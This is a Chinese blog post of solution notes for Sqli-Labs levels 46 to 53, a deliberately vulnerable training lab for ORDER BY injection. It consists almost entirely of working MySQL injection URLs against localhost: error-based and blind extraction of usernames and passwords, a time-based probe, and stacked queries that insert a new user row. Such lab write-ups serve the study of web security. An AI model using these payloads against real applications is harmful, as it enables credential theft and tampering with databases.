首页 > 数据库> > Sqli-Labs做题笔记:Less-46 - Less-53

Sqli-Labs做题笔记:Less-46 - Less-53

2022-01-26 12:02:06 作者：互联网

ORDER BY 注入

Less-46:

localhost/sqlilabs/Less-46/?sort=1 and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))

http://localhost/sqlilabs/Less-46/?sort=rand(ascii(mid((select%20group_concat(username)%20from%20users),1,1))=68)

Less-47:

localhost/sqlilabs/Less-47/?sort=1' and (updatexml(1,concat(0x5e24,(substr((select+group_concat(username,0x7e,password)+from+security.users),1)),0x7e),1))

Less-48:

http://localhost/sqlilabs/Less-48/?sort=rand(ascii(mid((select%20group_concat(username)%20from%20users),1,1))=68)

Less-49:

http://localhost/sqlilabs/Less-49/?sort=1%27%20and%20if(ascii(mid(database(),1,1))=115,sleep(0.1),0)--+

Less-50:

http://localhost/sqlilabs/Less-50/?sort=1;insert into users(id,username,password) values(69,'Joker','Joker')--+

Less-51:

http://localhost/sqlilabs/Less-51/?sort=1%27;insert into users(id,username,password) values(69,'Joker','Joker')--+

Less-52:

http://localhost/sqlilabs/Less-52/?sort=1;insert into users(id,username,password) values(69,'Joker','Joker')--+

Less-53:

http://localhost/sqlilabs/Less-53/?sort=1%27;insert into users(id,username,password) values(69,'Joker','Joker')--+

标签：sort,username,sqlilabs,Less,46,Joker,做题,localhost
来源： https://blog.csdn.net/Forever_Han13/article/details/122698590